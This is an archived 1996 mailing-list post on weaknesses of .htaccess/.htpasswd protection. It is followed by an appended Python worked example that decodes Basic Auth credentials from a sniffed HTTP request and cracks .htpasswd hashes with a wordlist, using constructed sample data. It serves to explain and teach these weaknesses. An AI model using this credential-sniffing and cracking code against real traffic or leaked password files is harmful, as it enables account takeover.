[3097] in WWW Security List Archive
Re: Any known holes in .htaccess/.htpasswd directory security?
daemon@ATHENA.MIT.EDU (Holger Reif)
Thu Sep 26 16:49:33 1996
Date: Thu, 26 Sep 96 20:51:53 +0200
From: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif)
To: www-security@ns2.rutgers.edu, Steff.Watkins@Bristol.ac.uk,
JOHNAL@attachmate.com
Errors-To: owner-www-security@ns2.rutgers.edu
Steff Watkins:
> "In Basic HTTP Authentication, the password is passed over the network not
> encrypted but not as plain text -- it is "uuencoded."
To be exact: base64 encoded.
> Anyone watching
> packet traffic on the network will not see the password in the clear, but
> the password will be easily decoded by anyone who happens to catch the
> right network packet."
> However, this still does NOT negate the fact that a user, intent on
> entry, may be able to pull the htpasswd file and then use 'crack' on it
> instead!!!
Right. The entries are encrypted using the crypt(3) routine and therefore
vulnerable to dictionary attacks.
John Allen:
> Eh? I created my .htpasswd file by cut and pasting my encrypted password
> from /etc/passwd ??!! And that file works just fine on my NCSA web
> server on my desk here at work??!! What system are you using?
Not necessarily a good idea, but if you use that password for unprotected telnet
over some network too, then you don't increase your risk of getting sniffed.
read you later - Holger Reif
---------------------------------------- Signature Project German Unity
TU Ilmenau - Computer Science - Telematics (Damn long ago)
Holger.Reif@PrakInf.TU-Ilmenau.DE To grow as old as a tree, so as to be
http://Remus.PrakInf.TU-Ilmenau.DE/Reif/ able to cross all 7 bridges
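The two points made above, as an added worked example that is not part of the thread: first, a Basic Authentication header pulled from a captured HTTP request is only base64, so the credentials fall out with one decode; second, an .htpasswd file obtained from the server is subject to an offline dictionary attack, because each entry is just a salted hash that anyone can recompute. The 1996 NCSA/Apache htpasswd format discussed in the thread is 13-character crypt(3) output, which this example handles through Python's crypt module where that module still exists (it was removed in Python 3.13); to stay runnable everywhere, the dictionary attack itself is demonstrated against Apache's "{SHA}" htpasswd format, which only needs hashlib. That format swap is mine, not the thread's. The request, the .htpasswd contents, the user names and the wordlist are all constructed for the example; because John Allen's entry was pasted from /etc/passwd, a crack of such an entry would also be a crack of the login password.

```python
import base64
import hashlib

try:
    # crypt(3) wrapper: deprecated in Python 3.11, removed in 3.13.
    # Only needed for the 13-character DES-style entries the thread discusses.
    import crypt as _crypt
except ImportError:
    _crypt = None


def extract_basic_credentials(raw_request):
    """Pull (user, password) out of a captured HTTP request, or None.

    Basic auth sends base64(user ":" password). Base64 is an encoding,
    not encryption, so whoever holds the packet reverses it trivially.
    """
    for line in raw_request.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "authorization":
            scheme, _, token = value.strip().partition(" ")
            if scheme.lower() == "basic":
                decoded = base64.b64decode(token.strip()).decode("latin-1")
                user, _, password = decoded.partition(":")
                return user, password
    return None


def sha_htpasswd(password):
    """Apache's "{SHA}" htpasswd format: base64 of the raw SHA-1 digest (unsalted)."""
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return "{SHA}" + base64.b64encode(digest).decode("ascii")


def check_htpasswd_entry(stored, candidate):
    """True if the candidate password matches one stored htpasswd hash."""
    if stored.startswith("{SHA}"):
        return sha_htpasswd(candidate) == stored
    if len(stored) == 13:
        # Traditional crypt(3): the first two characters are the salt,
        # which is all an attacker needs to recompute the hash offline.
        if _crypt is None:
            raise NotImplementedError("crypt(3) entries need the crypt module")
        return _crypt.crypt(candidate, stored[:2]) == stored
    raise ValueError("unrecognised htpasswd hash format: " + stored)


def dictionary_attack(htpasswd_text, wordlist):
    """Try every wordlist entry against every user; return {user: password} for hits."""
    cracked = {}
    for line in htpasswd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        user, _, stored = line.partition(":")
        for word in wordlist:
            if check_htpasswd_entry(stored, word):
                cracked[user] = word
                break
    return cracked


# Constructed sample request, as a sniffer would see it on the wire.
# The token is base64("steff:secret"); "steff" and "secret" are made up.
SNIFFED_REQUEST = (
    "GET /private/index.html HTTP/1.0\r\n"
    "Host: www.example.org\r\n"
    "Authorization: Basic c3RlZmY6c2VjcmV0\r\n"
    "\r\n"
)

# Constructed sample .htpasswd. It is generated here from known passwords so
# the example runs offline; the attacker, of course, sees only the hashes.
SAMPLE_HTPASSWD = "\n".join([
    "# constructed sample, not a real file",
    "steff:" + sha_htpasswd("secret"),
    "allen:" + sha_htpasswd("xQ7#v9!pLm2z"),
])

# A tiny stand-in for the wordlist a tool like crack would use.
WORDLIST = ["password", "letmein", "secret", "123456"]


if __name__ == "__main__":
    print("sniffed credentials:", extract_basic_credentials(SNIFFED_REQUEST))
    print("cracked from .htpasswd:", dictionary_attack(SAMPLE_HTPASSWD, WORDLIST))
```

Only "steff" cracks, because "secret" is in the wordlist and the other password is not; that is the whole defence against this attack once the file has leaked, which is why a strong password matters even more when the hash doubles as the system login.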